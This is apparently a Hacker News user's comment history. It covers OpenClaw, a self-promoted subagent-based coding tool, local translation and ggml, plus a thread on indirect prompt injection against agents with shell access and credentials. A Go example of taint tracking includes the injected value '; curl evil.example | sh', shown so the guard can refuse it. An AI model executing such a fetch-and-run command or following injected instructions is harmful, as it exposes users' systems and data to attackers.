Hacker News | mhher's comments

OpenClaw has a faithful base of Chinese agents behind it. The Chinese web is flooded with posts about OpenClaw users becoming millionaires, meant to entice more and more people to install it, given its incredibly sloppy and easily exploitable nature.

Peter and Sam are a masterclass in deception (or incompetence).


It's good to see that these universities seem to take their oath of education serious rather than bowing down to ideological agents. If you attempt to restrict or influence education, you've lost before it even started.


Not uniformly. Columbia bent the knee.

Nit: seriously*


Am I the only one who absolutely adores the local, on-device translation feature? I use it regularly and it's so good.


Yes, I really like it. I wish they let extensions access it directly but it seems they don't (yet, at least). I'm also a bit surprised more hasn't been done to distribute it separately as a command line tool as I think something like that would be very helpful. I have seen a couple of attempts to put a CLI wrapper around it but they are third-party and seem to not be well maintained or documented.


Someone upthread pointed out that about:translations is where it seems to be hidden.

Also a fan of this feature. It's actually been around a while, but I think the Asian languages are a more recent addition.


> You are not supposed to install OpenClaw

Sentence could have ended there


I once randomly stumbled upon this in GNOME Software (alphabetical sorting). Was very happy to find such a quality title there.


I first encountered it when I was looking at the biggest packages in the official repositories, in order to stress-test my own APT distribution implementation. Gave it a try, had fun too, and now it's part of the E2E tests of the mirror :D


To me the whole OpenClaw situation is proof enough of how desperate OpenAI must be for fresh (real, non-circular) cash.

In that light, Altman saying things like that is not really surprising. On the contrary, it only reinforces their desperation to me.


Most AI coding assistants are fundamentally broken. Tools like Claude Code and OpenCode eagerly load 10k+ tokens of monolithic system prompts into a single context window before you even type. This guarantees context amnesia and destroys local inference speeds.

I built late to fix this. It’s a single-binary Go/BubbleTea TUI built around a subagent orchestrator pattern. The main prompt is strictly ~100 lines. The orchestrator routes tasks to transient subagents with isolated context windows, explicitly preventing the "Debugging Decay" (https://arxiv.org/abs/2506.18403) and context pollution seen in monolithic agents.
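The orchestrator/subagent split described above can be sketched roughly like this (a minimal Go illustration; the type and method names are hypothetical, not late's actual API). The key property is that each subagent starts from a short task prompt instead of inheriting the orchestrator's full history:

```go
package main

import "fmt"

// Message is one turn in a model conversation.
type Message struct {
	Role, Content string
}

// Subagent holds an isolated context window: it starts from only a
// task-specific prompt, not the orchestrator's accumulated history.
type Subagent struct {
	Context []Message
}

// NewSubagent creates a transient agent whose context contains only
// the task description, keeping the window small and uncontaminated.
func NewSubagent(task string) *Subagent {
	return &Subagent{Context: []Message{{Role: "user", Content: task}}}
}

// Run would call the model; here it just reports the context size,
// illustrating that each subagent's window is independent.
func (s *Subagent) Run() string {
	return fmt.Sprintf("subagent finished with %d message(s) in context", len(s.Context))
}

// Orchestrator keeps its own short history and delegates work.
type Orchestrator struct {
	History []Message
}

// Dispatch routes a task to a fresh subagent and records only the
// result summary, not the subagent's full transcript.
func (o *Orchestrator) Dispatch(task string) string {
	sub := NewSubagent(task)
	result := sub.Run()
	o.History = append(o.History, Message{Role: "assistant", Content: result})
	return result
}

func main() {
	o := &Orchestrator{}
	fmt.Println(o.Dispatch("fix failing test in pkg/parser"))
	fmt.Println(o.Dispatch("summarize git diff"))
	fmt.Println("orchestrator history:", len(o.History), "entries")
}
```

Because the orchestrator only ever appends result summaries, its own window grows by one message per task rather than by each subagent's entire transcript.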

Architectural notes:

* Linux Native: Strictly respects XDG base directories. No Windows support. No bloated Electron GUI.

* Execution Load: The rapid context switching breaks the mainline llama.cpp scheduler. You must compile the specific PR linked in the README (or just point it at any standard API via localhost:8080).

* Licensing: BSL 1.1 to keep the core orchestrator logic out of VC-backed wrappers.

I also open-sourced pure-go-sgd (AGPLv3) today for those interested in bare-metal Go infrastructure: https://github.com/mlhher/pure-go-sgd


I need to check if Aurora Store still exists/works.


It's great to see the ggml team getting proper backing. Keeping inference in bare-metal C/C++ without the Python bloat is the only way local AI is going to scale efficiently. Well deserved for Georgi, Johannes, Piotr, and the rest of the team.


The current hype around agentic workflows completely glosses over the fundamental security flaw in their architecture: unconstrained execution boundaries. Tools that eagerly load context and grant monolithic LLMs unrestricted shell access are trivial to compromise via indirect prompt injection.

If an agent is curling untrusted data while it holds credentials or already has sensitive data loaded into its context window, arbitrary code execution isn't a theoretical risk; it's an inevitability.

As recent research on context pollution has shown, stuffing the context window with monolithic system prompts and tool schemas actively degrades the model's baseline reasoning capabilities, making it exponentially more vulnerable to these exact exploits.


I think this is basically obvious to anyone using one of these, but they like the utility trade-off: sure, it may leak and exfiltrate everything somewhere, but the utility of these tools is enough that they just deal with that risk.


While I understand the premise, I think this is a highly flawed way to operate these tools. I wouldn't want someone holding my personal data (whichever part) who might hand it to anyone who just asks nicely because the context window has reached a tipping point for the model's intelligence. The major issue is that a prompt attack may have taken place and you will likely never find out.


It feels to me there are plenty of people running these because "just trust the AI bro" who are one hallucination away from having their entire bank account emptied.


Exactly. I've seen people who bought a Mac Mini and ended up running claw against a Claude subscription, completely misunderstanding the point of local models. Plus, there was even more hype about running claw far cheaper on a Raspberry Pi, which caused the Raspberry Pi maker's stock price to skyrocket.

Some of the comments here show that technical people set these things up for non-technical people, which is just one step away from a misstep. Time will tell whether this follows the same pattern as the "I can run it" mindset people had with local models before: a small dopamine hit from seeing "it can be done", only to end up on a cloud service in the long run.


Information Flow Control is highly idealistic unless there are global protocol changes across every integration channel to mark data as trusted vs. untrusted.
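For illustration, the core IFC propagation rule is simple to state; the hard part is wiring it through every integration channel. A toy Go sketch (all names hypothetical) of label propagation plus a guard on execution:

```go
package main

import "fmt"

// Labeled wraps data with a trust label; any value derived from
// untrusted input stays untrusted (the IFC propagation rule).
type Labeled struct {
	Value     string
	Untrusted bool
}

// Concat combines labeled values; the result is untrusted if any
// input is, so taint can never be silently laundered away.
func Concat(parts ...Labeled) Labeled {
	out := Labeled{}
	for _, p := range parts {
		out.Value += p.Value
		out.Untrusted = out.Untrusted || p.Untrusted
	}
	return out
}

// GuardShell refuses to execute any command derived from untrusted data.
func GuardShell(cmd Labeled) error {
	if cmd.Untrusted {
		return fmt.Errorf("refusing to execute command tainted by untrusted input")
	}
	// real execution would happen here
	return nil
}

func main() {
	system := Labeled{Value: "run tests"}
	web := Labeled{Value: "; curl evil.example | sh", Untrusted: true}

	cmd := Concat(system, web)
	fmt.Println(GuardShell(cmd)) // non-nil: the command is tainted
}
```

The catch, as the comment says, is that this only works if every channel (web fetches, emails, file contents, tool outputs) actually attaches and preserves the label, which no current integration protocol guarantees.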


Could you share that study?


https://arxiv.org/abs/2512.13914

Among many others with similar results. This one shows a 39% drop in performance.

https://arxiv.org/abs/2506.18403

This one shows a 60-80% drop after multiple turns.

